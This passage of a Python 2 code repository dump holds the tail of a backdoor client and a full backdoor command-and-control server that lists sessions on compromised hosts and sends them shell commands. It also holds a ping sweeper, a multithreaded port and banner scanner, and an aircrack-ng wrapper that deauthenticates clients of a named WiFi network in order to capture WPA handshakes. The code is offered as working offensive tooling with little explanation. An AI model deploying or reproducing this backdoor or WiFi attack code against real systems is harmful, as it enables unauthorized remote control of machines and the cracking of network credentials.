| conn.send(str(len(result)).zfill(16)+result) 102 | else: 103 | run_command(conn, command) 104 | except: 105 | break 106 | 107 | conn.close() -------------------------------------------------------------------------------- /simple_backdoor_demo/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | #!/usr/bin/env python 5 | # -*- coding:utf-8 -*- 6 | 7 | import sys 8 | import random 9 | import socket 10 | import threading 11 | 12 | def show_help(): 13 | help_message = """ 14 | [*] Show the help info 15 | help(): show this help info 16 | exit(): exit the terminal of the server 17 | set port PORT: set the listen port 18 | start: start to listen 19 | sessions: show the established sessions 20 | entersession SESSIONID: enter the specified session 21 | killsession SESSIONID: kill the process of the specified SESSIONID client 22 | """ 23 | print help_message 24 | 25 | def show_session_help(): 26 | help_message = """ 27 | [*] Show the session help info 28 | help(): show this help info 29 | exit(): exit the session 30 | killsession(): kill the process of the client 31 | info(): show the info of the selected session 32 | set timeout TIMEOUT: set the timeout of a command 33 | """ 34 | print help_message 35 | 36 | def random_sessionid(): 37 | return ''.join([random.choice('ABCDEFGH1234567890') for i in range(6)]) 38 | 39 | def recv_result(conn): 40 | result = conn.recv(1024) 41 | total_size = long(result[:16]) 42 | result = result[16:] 43 | while total_size > len(result): 44 | data = conn.recv(1024) 45 | result += data 46 | return result 47 | 48 | def accept_socket(conn): 49 | host_info = recv_result(conn) 50 | hostname, system, arch, user, ips, remark, timeout, port = host_info.split('---') 51 | for _ in SOCK_LIST: 52 | if hostname == _['hostname'] and ips == _['ips'] and remark == _["remark"] and port == _['port']: 53 | conn.close() 54 | return 55 | sessionid = random_sessionid() 56 | print "[+] Session established from: %s, Press 'Enter' to continue"%(sessionid) 57 | conn_dict = { 58 | 'sessionid' : sessionid, 59 | 'hostname' : hostname, 60 | 'system' : system, 61 | 'arch' : arch, 62 | 'user' : user, 63 | 'ips' : ips, 64 | 'remark' : remark, 65 | 'timeout' : timeout, 66 | 'port' : port, 67 | 'conn' : conn, 68 | } 69 | SOCK_LIST.append(conn_dict) 70 | 71 | def show_host_info(session): 72 | host_info = """ 73 | [*] The host info of Session %s 74 | Hostname: %s 75 | Remark: %s 76 | System: %s 77 | Arch: %s 78 | User: %s 79 | IP: %s 80 | CommandTimeout: %s 81 | ConnectionPort: %s 82 | """%(session['sessionid'], session['hostname'], session['remark'],\ 83 | session['system'], session['arch'], session['user'], session['ips'], session['timeout'], session['port']) 84 | print host_info 85 | 86 | def start_listen(port): 87 | try: 88 | host = '0.0.0.0' 89 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 90 | s.bind((host, port)) 91 | s.listen(100) 92 | while 1: 93 | conn, addr = s.accept() 94 | accept_socket(conn) 95 | 96 | except socket.error: 97 | print '[-] Listen failed, please use a free port' 98 | 99 | def kill_session(sessionid, conn): 100 | conn.send("killsession()") 101 | print "[*] kill the process of the client %s"%(sessionid) 102 | for _ in SOCK_LIST: 103 | if sessionid.lower() == _['sessionid'].lower(): 104 | SOCK_LIST.remove(_) 105 | 106 | def enter_session(session): 107 | sessionid = session['sessionid'] 108 | conn = session['conn'] 109 | remark = str(session['remark']) 110 | while 1: 111 | try: 112 | command = raw_input("$ %s@%s> "%(remark, sessionid)) 113 | if command == "": 114 | continue 115 | elif command == "exit()": 116 | print "[*] exit the session %s"%(sessionid) 117 | break 118 | elif command == "killsession()": 119 | kill_session(sessionid, conn) 120 | break 121 | elif command == "help()": 122 | show_session_help() 123 | elif command == "info()": 124 | conn.send(command) 125 | try: 126 | session['timeout'] = recv_result(conn).split('---')[6] 127 | except: 128 | pass 129 | show_host_info(session) 130 | else: 131 | conn.send(command) 132 | print recv_result(conn) 133 | except: 134 | pass 135 | 136 | if __name__=="__main__": 137 | SOCK_LIST = [] 138 | while 1: 139 | command = raw_input("#> ") 140 | if command == 'help()': 141 | show_help() 142 | elif command == "exit()": 143 | print "[*] User exit" 144 | break 145 | elif command.startswith('set port'): 146 | try: 147 | port = int(command.split()[2]) 148 | except Exception as e: 149 | print '[-] set port PORT, PORT should be an integer number range 1-65535' 150 | elif command == "start": 151 | try: 152 | t = threading.Thread(target=start_listen, args=(port,)) 153 | t.setDaemon(True) 154 | t.start() 155 | except NameError: 156 | print '[-] Please set the PORT first' 157 | elif command == 'sessions': 158 | print "%-15s%-30s%-10s%-50s%-20s"%('SessionID', 'Hostname', 'User', 'IP', 'Remark') 159 | for _ in SOCK_LIST: 160 | print "%-15s%-30s%-10s%-50s%-20s"%(_['sessionid'], _['hostname'], _['user'], _['ips'], _['remark']) 161 | elif command.startswith('entersession'): 162 | try: 163 | sessionid = command.split()[1] 164 | session_flag = 0 165 | for _ in SOCK_LIST: 166 | if sessionid.lower() == _['sessionid'].lower(): 167 | print "[*] Enter the session %s"%(sessionid) 168 | enter_session(_) 169 | session_flag = 1 170 | if session_flag == 0: 171 | print "[-] No such session" 172 | if len(SOCK_LIST) == 0: 173 | print "[-] No established session" 174 | except: 175 | print "[-] session SESSIONID, type 'sessions' to show the established sessions and the SESSIONID" 176 | elif command.startswith('killsession'): 177 | try: 178 | sessionid = command.split()[1] 179 | session_flag = 0 180 | for _ in SOCK_LIST: 181 | if sessionid.lower() == _['sessionid'].lower(): 182 | kill_session(sessionid, _['conn']) 183 | session_flag = 1 184 | if session_flag == 0: 185 | print "[-] No such session" 186 | except Exception as e: 187 | print e 188 | print "[-] killsession SESSIONID, type 'sessions' to show the established sessions and the SESSIONID" 189 | else: 190 | print "[-] type 'help()' to show the help info" -------------------------------------------------------------------------------- /wifi_security_helper/README.md: -------------------------------------------------------------------------------- 1 | Some scripts for WiFi security 2 | 3 | wifi_helper.py : it's a script just for using Aircrack-ng easily 4 | 5 | pinger.py : to find IPs in (wifi)intranet 6 | 7 | port_banner_scan.py : to get a opened-port and the banner, if the service of the port is web, the script will get the web title 8 | -------------------------------------------------------------------------------- /wifi_security_helper/pinger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # to find IPs in (wifi)intranet 4 | # 5 | # Usage: 6 | # pinger.py IP [-A] [thread] 7 | # or 8 | # pinger.py IP [thread] [-A] 9 | # 10 | # default network_number=16 192.168.1.1/16 11 | # use -A to set network_number=8 192.168.1.1/8 12 | 13 | import re 14 | import os 15 | import sys 16 | import time 17 | import Queue 18 | import threading 19 | from subprocess import Popen, PIPE 20 | 21 | mutex = threading.Lock() 22 | 23 | def ping_scan(ip): 24 | if os.name == "nt": 25 | try: 26 | p=Popen('ping -n 1 ' + ip, stdout=PIPE) 27 | except: 28 | sys.exit("[*] Can't ping") 29 | if p.stdout.read().find("TTL") != -1: return True 30 | else: 31 | try: 32 | p=Popen(['ping','-c 1',ip], stdout=PIPE, stderr=PIPE) 33 | except: 34 | sys.exit("[*] Can't ping") 35 | if p.stdout.read().find("1 received") != -1: return True 36 | return False 37 | 38 | def start(): 39 | while not q.empty(): 40 | try: 41 | ip = q.get(True, 1) 42 | if ping_scan(ip): 43 | mutex.acquire() 44 | print "[+] %s is up"%(ip) 45 | mutex.release() 46 | except: 47 | pass 48 | finally: 49 | q.task_done() 50 | 51 | if __name__ == "__main__": 52 | if len(sys.argv) < 2 or len(sys.argv) > 4: 53 | sys.exit("[*] Usage: %s IP [-A] [thread]"%(sys.argv[0])) 54 | try: 55 | t1 = time.time() 56 | thread_num = int(sys.argv[-1]) if sys.argv[-1].isdigit() else int(sys.argv[-2]) if sys.argv[-2].isdigit() else 200 57 | 58 | ip = sys.argv[1] 59 | if len(ip.split(".")) != 4: sys.exit("[*] Usage: %s IP [-A] [thread]"%(sys.argv[0])) 60 | for i in ip.split("."): 61 | if int(i) < 0 or int(i) > 255: 62 | sys.exit("[*] Usage: %s IP [-A] [thread]"%(sys.argv[0])) 63 | 64 | if sys.argv[-1] == "-A" or sys.argv[-2] == "-A": 65 | ip_start = ip.split(".")[0] 66 | ip_list1 = ["%s.%d.%d.1"%(ip_start, i, j) for i in range(256) for j in range(256)] 67 | ip_list2 = ["%s.%d.%d.254"%(ip_start, i, j) for i in range(256) for j in range(256)] 68 | ip_list = list(set(ip_list1+ip_list2)) 69 | print "[*] scan %s.0.0.0/8 with %d threads"%(ip_start, thread_num) 70 | else: 71 | ip_start = ".".join([ip.split(".")[0], ip.split(".")[1]]) 72 | ip_list1 = ["%s.%d.1"%(ip_start, i) for i in range(256)] 73 | ip_list2 = ["%s.%d.254"%(ip_start, i) for i in range(256)] 74 | ip_list = list(set(ip_list1+ip_list2)) 75 | print "[*] scan %s.0.0/16 with %d threads"%(ip_start, thread_num) 76 | 77 | q = Queue.Queue() 78 | map(lambda x: q.put(x), ip_list) 79 | map(lambda x: x.start(), [threading.Thread(target=start) for i in range(thread_num)]) 80 | q.join() 81 | sys.exit("[*] scan over in %ss"%(time.time() - t1)) 82 | except Exception as e: 83 | sys.exit(e) -------------------------------------------------------------------------------- /wifi_security_helper/port_banner_scan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # to get a opened-port and the banner, if the service of the port is web, the script will get the web title 5 | # 6 | # Usage: 7 | # port_banner_scan.py IP/CIDR [ports] [-o outputfile] [-t theadnum] 8 | 9 | import re 10 | import sys 11 | import Queue 12 | import socket 13 | import chardet 14 | import requests 15 | import threading 16 | from netaddr import IPNetwork 17 | mutex = threading.Lock() 18 | requests.packages.urllib3.disable_warnings() 19 | 20 | PORTS = [21,22,23,25,53,67,68,80,81,82,83,84,85,86,87,88,89,90,109,110,139,143,161,389,443,445,465,512,513,514,808,843,873,880,888,993,995,1080,1090,1098,1099,1158,1352,1433,1434,1521,1723,1873,2082,2083,2181,2222,2375,2601,2604,3128,3306,3311,3312,3389,3690,4440,4444,4445,4848,5000,5432,5632,5800,5900,5984,6082,6379,7001,7002,7778,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8020,8030,8040,8050,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8099,8100,8161,8200,8291,8443,8480,8488,8588,8688,8788,8800,8888,8900,9000,9001,9002,9003,9004,9005,9006,9007,9008,9909,9010,9020,9030,9040,9050,9060,9070,9080,9090,9043,9200,9300,9060,9080,9090,9999,10000,10001,10990,11211,14147,27017,28017,50000,50030,50070,61616] 21 | result = [] 22 | 23 | def gettitle(ip, port): 24 | urls = ["http://%s:%d"%(ip, int(port)), "https://%s:%d"%(ip, int(port))] 25 | for url in urls: 26 | try: 27 | req = requests.get(url, timeout=2, verify=False) 28 | if req.status_code == 400: 29 | continue 30 | title_match = re.search(r'(.*?)', req.content, flags=re.I|re.M) 31 | if title_match: title=title_match.group(1) 32 | return title 33 | except: 34 | pass 35 | return "" 36 | 37 | def portscan(ip, port): 38 | service_info = "" 39 | title = "" 40 | try: 41 | socket.setdefaulttimeout(2.0) 42 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 43 | s.connect((ip, int(port))) 44 | except: 45 | return False, "" 46 | 47 | try: 48 | s.send('hello') 49 | r = s.recv(512) 50 | service_info = ''.join(r.splitlines()) 51 | if "http" in r.lower(): 52 | for i in r.splitlines(): 53 | if 'server' in i.lower(): 54 | service_info = i 55 | title = gettitle(ip, port) 56 | s.close() 57 | except: 58 | pass 59 | return service_info, title 60 | 61 | def start(): 62 | while not q.empty(): 63 | try: 64 | ip, port = q.get(block = True, timeout = 1).split(':') 65 | service_info, title = portscan(ip, port) 66 | if service_info != False: 67 | mutex.acquire() 68 | try: 69 | if chardet.detect(title)['encoding'] == 'utf-8': 70 | title = title.decode('utf-8') 71 | result.append("%-18s\t%-5s\t%-50s\t%-20s"%(ip, str(port), service_info, title)) 72 | print "%-18s\t%-5s\t%-50s\t%-20s"%(ip, str(port), service_info, title) 73 | mutex.release() 74 | except: 75 | print "\n" 76 | mutex.release() 77 | q.task_done() 78 | except Exception as e: 79 | pass 80 | 81 | if __name__ == "__main__": 82 | threads = 200 83 | output = "" 84 | allports = 0 85 | argvs = sys.argv[:] 86 | 87 | if '-t' in argvs: 88 | try: 89 | threads = int(argvs[argvs.index('-t')+1]) 90 | del argvs[argvs.index('-t')+1], argvs[argvs.index('-t')] 91 | except: 92 | sys.exit('[*] threads error') 93 | if '-o' in argvs: 94 | try: 95 | output = argvs[argvs.index('-o')+1] 96 | del argvs[argvs.index('-o')+1], argvs[argvs.index('-o')] 97 | except: 98 | sys.exit('[*] output file error') 99 | if '-all' in argvs: 100 | allports = 1 101 | argvs.remove('-all') 102 | 103 | if len(argvs) == 2: 104 | ports = PORTS 105 | elif len(argvs) == 3: 106 | try: 107 | ports = argvs[2].split(',') 108 | for port in ports: 109 | if int(port) < 1 or int(port) > 65535: 110 | sys.exit("[*] ports should be 1-65535") 111 | except: 112 | sys.exit('[*] ports should be a comma-separated list') 113 | else: 114 | sys.exit('Usage: %s IP/CIDR [ports] [-o outputfile] [-t theadnum]'%(argvs[0])) 115 | 116 | try: 117 | ips = IPNetwork(argvs[1]) 118 | except: 119 | sys.exit("[*] IP format error") 120 | if allports == 1: 121 | map(lambda x: ports.append(x), range(1, 65536)) 122 | ip_list = [ip.format() for ip in ips] 123 | port_list = list(set(ports)) 124 | 125 | ip_port_list = [ip+":"+str(port) for ip in ip_list for port in port_list] 126 | 127 | result.append("%s\n%s\n%-18s\t%-5s\t%-50s\t%-20s\n%s"%(' '.join(sys.argv), '-'*100, "IP", "Port", "ServiceInfo", "WebTitle", '-'*100)) 128 | print "%s\n%s\n%-18s\t%-5s\t%-50s\t%-20s\n%s"%(' '.join(sys.argv), '-'*100, "IP", "Port", "ServiceInfo", "WebTitle", '-'*100) 129 | q = Queue.Queue() 130 | map(lambda x: q.put(x), ip_port_list) 131 | map(lambda x: x.start(), [threading.Thread(target=start) for i in range(threads)]) 132 | q.join() 133 | result.append("-"*100) 134 | print "-"*100 135 | 136 | if output != "": 137 | try: 138 | fp = open(output, "a+") 139 | map(lambda x: fp.writelines(x+'\n'), result) 140 | fp.close() 141 | except: 142 | pass -------------------------------------------------------------------------------- /wifi_security_helper/wifi_helper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # it's a script just for using Aircrack-ng easily 5 | # 6 | # Usage: 7 | # wifi_helper.py interface wifi-name 8 | 9 | import os 10 | import sys 11 | import time 12 | from multiprocessing import Process 13 | 14 | class WIFIGeter: 15 | def __init__(self, interface, name): 16 | self.interface = interface 17 | self.name = name 18 | self.essid = "" 19 | self.bssid = "" 20 | self.flag = 0 21 | 22 | self.stop() 23 | self.start() 24 | self.stop() 25 | 26 | def start(self): 27 | p = os.system('ifconfig %s down'%(self.interface)) 28 | p = os.system('iwconfig %s mode monitor'%(self.interface)) 29 | p = os.system('rm -rf tmp-wifi-%s*'%(self.name)) 30 | p = os.system('rm -rf result-wifi-%s*'%(self.name)) 31 | 32 | p1 = Process(target=self.get_all_wifis_bssid()) 33 | p1.start() 34 | p2 = Process(target=self.get_specified_wifi_bssid_by_name()) 35 | p2.start() 36 | p2.join() 37 | p3 = Process(target=self.get_specified_wifi_handshake()) 38 | p3.start() 39 | p4 = Process(target=self.send_repaly_package()) 40 | p4.start() 41 | p4.join() 42 | 43 | def get_all_wifis_bssid(self): 44 | p = os.system('airodump-ng %s -w tmp-wifi-%s --output-format csv &'%(self.interface, self.name)) 45 | 46 | def get_specified_wifi_bssid_by_name(self): 47 | csv_size = 0 48 | while True: 49 | try: 50 | fp = open('tmp-wifi-%s-01.csv'%(self.name), 'r+') 51 | for i in fp.readlines(): 52 | if self.name.lower() in i.lower(): 53 | print time.strftime('%H:%M:%S',time.localtime(time.time())) 54 | print i.split(',') 55 | self.essid = i.split(',')[-2].strip() 56 | self.bssid = i.split(',')[0].strip() 57 | self.channel = i.split(',')[3].strip() 58 | break 59 | fp.close() 60 | if len(self.essid) > 0: 61 | break 62 | time.sleep(5) 63 | if csv_size == os.path.getsize('tmp-wifi-%s-01.csv'%(self.name)): 64 | self.stop() 65 | self.start() 66 | else: 67 | csv_size = os.path.getsize('tmp-wifi-%s-01.csv'%(self.name)) 68 | except Exception as e: 69 | pass 70 | p = os.system(r"ps -aux | grep airodump-ng | grep tmp-wifi-%s | awk '{ print $2 }'| xargs kill -9"%(self.name)) 71 | p = os.system('rm -rf tmp-wifi-%s*'%(self.name)) 72 | 73 | def get_specified_wifi_handshake(self): 74 | p = os.system('airodump-ng -w result-wifi-%s -c %s --bssid %s %s --output-format cap &'%(self.name, self.channel, self.bssid, self.interface)) 75 | 76 | def send_repaly_package(self): 77 | cap_size = 0 78 | while True: 79 | os.system(r"ps -aux | grep aireplay-ng | awk '{ print $2 }'| xargs kill -9") 80 | time.sleep(5) 81 | p = os.system('aireplay-ng -0 10 -a %s %s &'%(self.bssid, self.interface)) 82 | self.check_handshake() 83 | if self.flag == 1: 84 | os.system(r"ps -aux | grep aireplay-ng | awk '{ print $2 }'| xargs kill -9") 85 | break 86 | time.sleep(5) 87 | try: 88 | if cap_size == os.path.getsize('result-wifi-%s-01.cap'%(self.name)): 89 | self.stop() 90 | self.start() 91 | else: 92 | cap_size = os.path.getsize('result-wifi-%s-01.cap'%(self.name)) 93 | except: 94 | pass 95 | 96 | 97 | def check_handshake(self): 98 | p = os.popen('aircrack-ng result-wifi-%s-01.cap'%(self.name)) 99 | if '1 handshake' in p.read(): 100 | self.flag = 1 101 | 102 | def stop(self): 103 | p = os.system(r"ps -aux | grep airodump-ng | grep tmp-wifi-%s | awk '{ print $2 }'| xargs kill -9"%(self.name)) 104 | p = os.system(r"ps -aux | grep airodump-ng | grep result-wifi-%s | awk '{ print $2 }'| xargs kill -9"%(self.name)) 105 | p = os.system(r"ps -aux | grep aireplay-ng | awk '{ print $2 }'| xargs kill -9") 106 | 107 | if len(sys.argv) != 3: 108 | sys.exit("Usage: %s interface wifi-name"%(sys.argv[0])) 109 | 110 | interface = sys.argv[1] 111 | name = sys.argv[2] 112 | 113 | try: 114 | target=WIFIGeter(interface, name) 115 | except KeyboardInterrupt: 116 | WIFIGeter(interface, name).stop() 117 | 118 | sys.exit() --------------------------------------------------------------------------------